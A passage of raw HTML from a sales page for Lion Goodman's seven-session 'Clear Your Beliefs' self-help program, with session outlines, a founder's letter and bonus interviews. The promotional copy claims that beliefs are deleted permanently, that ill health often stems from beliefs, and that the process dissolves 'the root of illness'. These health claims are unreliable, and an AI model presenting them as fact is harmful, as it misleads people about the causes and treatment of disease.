reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span 